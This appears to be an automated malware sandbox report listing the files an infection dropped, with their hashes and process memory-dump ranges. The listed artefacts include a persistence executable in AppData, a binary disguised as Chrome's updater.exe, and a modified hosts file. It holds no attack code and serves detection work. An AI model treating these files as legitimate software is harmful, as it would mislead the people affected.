SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

C:\Users\Admin\AppData\Local\Temp\is-OKMTS.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/4628-311-0x0000000073300000-0x00000000739EE000-memory.dmp

memory/4628-312-0x0000000007360000-0x000000000736A000-memory.dmp

memory/1032-314-0x000001A6CF850000-0x000001A6CF8D4000-memory.dmp

memory/2552-316-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/2552-317-0x000001597E470000-0x000001597E480000-memory.dmp

memory/2552-318-0x000001597E470000-0x000001597E480000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f91c15760042c6a1967ef15545b9d516
SHA1 5b4cff3959b1d45f522dc7b797524a1842c952cd
SHA256 03abfc18be7e1857550c9a0b45e044b42aa64e116508bc74f5426d2b07b4d812
SHA512 39744cfe0f7b7e760e505383ff30500203e9c47b1b71a2e707a52682f5da5d6c1c11f6977f9b630c9bb177aab319c4962f211865b807d1f8e8d21100acf09155

memory/1032-320-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/3828-322-0x00000000008B0000-0x00000000008B1000-memory.dmp

memory/4104-326-0x0000000002DE0000-0x0000000002F51000-memory.dmp

memory/4104-327-0x0000000002F60000-0x0000000003091000-memory.dmp

memory/1032-331-0x000001A6CFC70000-0x000001A6CFCD2000-memory.dmp

memory/4200-330-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/4940-332-0x0000000000400000-0x0000000000513000-memory.dmp

memory/3828-333-0x0000000000400000-0x000000000071C000-memory.dmp

memory/2552-372-0x000001597E470000-0x000001597E480000-memory.dmp

memory/1032-371-0x000001A6E9E70000-0x000001A6E9E80000-memory.dmp

memory/1032-373-0x000001A6E9D10000-0x000001A6E9D6E000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/4628-382-0x00000000053F0000-0x0000000005400000-memory.dmp

memory/2552-381-0x000001597E470000-0x000001597E480000-memory.dmp

memory/2552-386-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp

memory/4200-391-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

memory/3828-393-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

memory/3828-406-0x0000000000400000-0x000000000071C000-memory.dmp

memory/3080-407-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\62feVopRHxuPs3P80VoHsWds.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/4200-410-0x00007FF76EC10000-0x00007FF76F153000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\50-12455-789-680a2-6b7bd6c441069\Wucihaewypi.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/4928-428-0x000000006B540000-0x000000006BAF0000-memory.dmp

memory/4928-429-0x00000000033B0000-0x00000000033C0000-memory.dmp

memory/1032-432-0x00007FFCF6400000-0x00007FFCF6DEC000-memory.dmp
